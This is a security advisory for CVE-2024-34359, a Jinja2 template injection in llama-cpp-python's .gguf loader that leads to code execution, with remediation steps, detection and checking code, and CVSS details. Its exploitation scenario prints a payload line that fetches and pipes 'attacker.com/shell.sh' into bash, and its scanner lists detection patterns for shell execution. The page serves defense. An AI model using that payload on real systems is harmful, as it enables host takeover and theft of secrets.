CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE
CRITICAL | PoC AVAILABLE | CISA: ATTEND
Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded, whether via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
What is the risk?
Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with a network attack vector and low attack complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag (UI:R) is misleading in AI/ML contexts: loading new models is routine workflow for developers, MLOps, and researchers, so it is practically no barrier. The changed scope (S:C) combined with high confidentiality, integrity, and availability impact (C:H/I:H/A:H) means full host takeover, not just model compromise. There is no evidence of active exploitation (no CISA KEV listing) at time of publication, but using models as an attack vector is a maturing supply chain threat with a high probability of real-world abuse.
What should I do?
- Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
- Source control: only load .gguf files from verified, internally-mirrored model registries; treat external model files as untrusted binaries.
- Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
- Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
- Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
- Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
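The pipeline gate step could be sketched roughly as follows. This is a minimal heuristic, not a complete detector: the pattern list and the function name `scan_chat_template` are assumptions made for illustration, and the sketch expects the chat_template string to have already been extracted from the .gguf metadata by a GGUF reader of your choice.

```python
import re
from typing import List

# Heuristic patterns seen in Jinja2 SSTI payloads. This list is an assumption
# for illustration and is not exhaustive.
SUSPICIOUS_PATTERNS = [
    r"__\w+__",                   # dunder access such as __class__ or __mro__
    r"\bsubprocess\b",            # direct reference to the subprocess module
    r"\bos\.(?:system|popen)\b",  # shell execution helpers
    r"\b(?:eval|exec)\s*\(",      # dynamic code evaluation
    r"\|\s*attr\s*\(",            # the attr filter, often used to dodge dunder checks
]
_COMPILED = [re.compile(p) for p in SUSPICIOUS_PATTERNS]


def scan_chat_template(template: str) -> List[str]:
    """Return every suspicious substring found in a chat template string."""
    hits = []
    for pattern in _COMPILED:
        hits.extend(match.group(0) for match in pattern.finditer(template))
    return hits


benign = "{% for m in messages %}{{ m['role'] }}: {{ m['content'] }}{% endfor %}"
suspect = "{{ ''.__class__.__mro__[2].__subclasses__() }}"

print(scan_chat_template(benign))
print(scan_chat_template(suspect))
```

A gate like this only reduces risk. Pattern matching can be bypassed by obfuscated payloads, so it complements patching and sandboxing rather than replacing them.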
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-34359?
Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Is CVE-2024-34359 actively exploited?
There is no evidence of active exploitation at time of publication. However, proof-of-concept exploit code is publicly available for CVE-2024-34359, which increases the risk of exploitation.
How to fix CVE-2024-34359?
1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
2. Source control: only load .gguf files from verified, internally-mirrored model registries; treat external model files as untrusted binaries.
3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
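The patch and audit steps lend themselves to a small check script. The sketch below uses only the Python standard library. The helper names (`is_patched`, `installed_version_is_patched`, `sha256_of`) are hypothetical, and the version parser assumes plain `X.Y.Z` release strings without pre-release suffixes.

```python
import hashlib
from importlib import metadata

PATCHED = (0, 2, 72)  # first fixed release according to this advisory


def parse_version(version: str) -> tuple:
    """Parse a plain 'X.Y.Z' release string; pre-release suffixes are not handled."""
    return tuple(int(part) for part in version.split(".")[:3])


def is_patched(version: str) -> bool:
    """True if the given version string is at or above the fixed release."""
    return parse_version(version) >= PATCHED


def installed_version_is_patched():
    """Return True/False for the installed package, or None if it is not installed."""
    try:
        return is_patched(metadata.version("llama-cpp-python"))
    except metadata.PackageNotFoundError:
        return None


def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large model files are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


print(is_patched("0.2.71"), is_patched("0.2.72"))
```

For the audit step, the digest returned by `sha256_of` would be compared against the value published by the trusted source registry. Where that reference value comes from is deployment-specific and is not covered here.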
What systems are affected by CVE-2024-34359?
This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.
What is the CVSS score for CVE-2024-34359?
CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 28.42%.
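As a worked check, the 9.6 base score can be recomputed from the vector string listed in this advisory's CVSS Vector section. The sketch below follows the base-score equations and metric weights of the CVSS v3.1 specification as best understood here. The function names are illustrative, and temporal and environmental metrics are ignored.

```python
import math

# Base metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required weights depend on whether scope is changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place using the spec's integer-based method."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a vector such as 'CVSS:3.1/AV:N/...'."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    c, i, a = (WEIGHTS["CIA"][metrics[k]] for k in ("C", "I", "A"))

    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * WEIGHTS["AV"][metrics["AV"]] * WEIGHTS["AC"][metrics["AC"]]
        * pr * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

The changed scope contributes the 1.08 multiplier. The same vector with S:U would score lower, which is why scope change matters so much for this CVE.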
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
- AML.T0002.001 Models
- AML.T0010.003 Model
- AML.T0011.000 Unsafe AI Artifacts
- AML.T0018.002 Embed Malware
- AML.T0050 Command and Scripting Interpreter
Compliance Controls Affected
What are the technical details?
Original Advisory
llama-cpp-python provides the Python bindings for llama.cpp. `llama-cpp-python` depends on the class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor of `Llama` takes several parameters that configure how the model is loaded and run. Besides `NUMA, LoRa settings`, `loading tokenizers`, and `hardware settings`, `__init__` also loads the `chat template` from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. However, `Jinja2ChatFormatter` parses the `chat template` from the metadata with a sandbox-less `jinja2.Environment`, and the template is then rendered in `__call__` to construct the `prompt` of the interaction. This allows `jinja2` Server Side Template Injection, which leads to remote code execution through a carefully constructed payload.
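The difference between a sandbox-less and a sandboxed Jinja2 environment can be illustrated with a harmless probe template. This is a sketch, not the project's actual fix: `compare_environments` is a hypothetical helper, and the choice of `ImmutableSandboxedEnvironment` is an assumption, since this advisory only states that the patch introduces a sandboxed environment. The import is guarded because `jinja2` is a third-party package.

```python
try:
    from jinja2 import Environment
    from jinja2.exceptions import SecurityError
    from jinja2.sandbox import ImmutableSandboxedEnvironment
except ImportError:  # jinja2 is not part of the standard library
    Environment = None


def compare_environments(template_source: str):
    """Render one template in a plain and in a sandboxed environment.

    Returns (plain_output, sandbox_blocked), or None when jinja2 is missing.
    """
    if Environment is None:
        return None
    # The plain environment resolves dunder attributes without restriction.
    plain_output = Environment().from_string(template_source).render()
    try:
        ImmutableSandboxedEnvironment().from_string(template_source).render()
        sandbox_blocked = False
    except SecurityError:
        # The sandbox refuses access to attributes that start with an underscore.
        sandbox_blocked = True
    return plain_output, sandbox_blocked


# A harmless probe: it only reads the type hierarchy of a string literal.
result = compare_environments("{{ ''.__class__.__mro__ }}")
print(result)
```

When `jinja2` is installed, the plain environment is expected to print the type hierarchy, while the sandboxed one should raise `SecurityError`. That is the behavior change the patch relies on.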
Exploitation Scenario
An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation the template is parsed in an unsandboxed environment; per the original advisory, it is rendered when the chat handler builds a prompt, at which point the payload executes. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
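To see why unrestricted attribute access in a template amounts to arbitrary code execution, it helps to trace the introspection chain in plain Python. The sketch below only locates a class and never invokes it. The helper name `find_subclass` is hypothetical, and `__mro__[-1]` is used because the last entry of a method resolution order is always `object`.

```python
import subprocess  # imported so that Popen is loaded as a subclass of object


def find_subclass(module_name: str, class_name: str):
    """Walk from a string literal to `object`, then search its direct subclasses."""
    root = "".__class__.__mro__[-1]  # str -> object
    for cls in root.__subclasses__():
        if cls.__module__ == module_name and cls.__name__ == class_name:
            return cls
    return None


found = find_subclass("subprocess", "Popen")
print(found is subprocess.Popen)  # True
```

Starting from nothing more than an empty string, the chain reaches a class that can spawn processes. This is why the fix restricts attribute access rather than trying to filter specific payload strings.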
Weaknesses (CWE)
CWE-76 — Improper Neutralization of Equivalent Special Elements: The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.
- [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
- [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain
CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain
CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain
CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain
CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution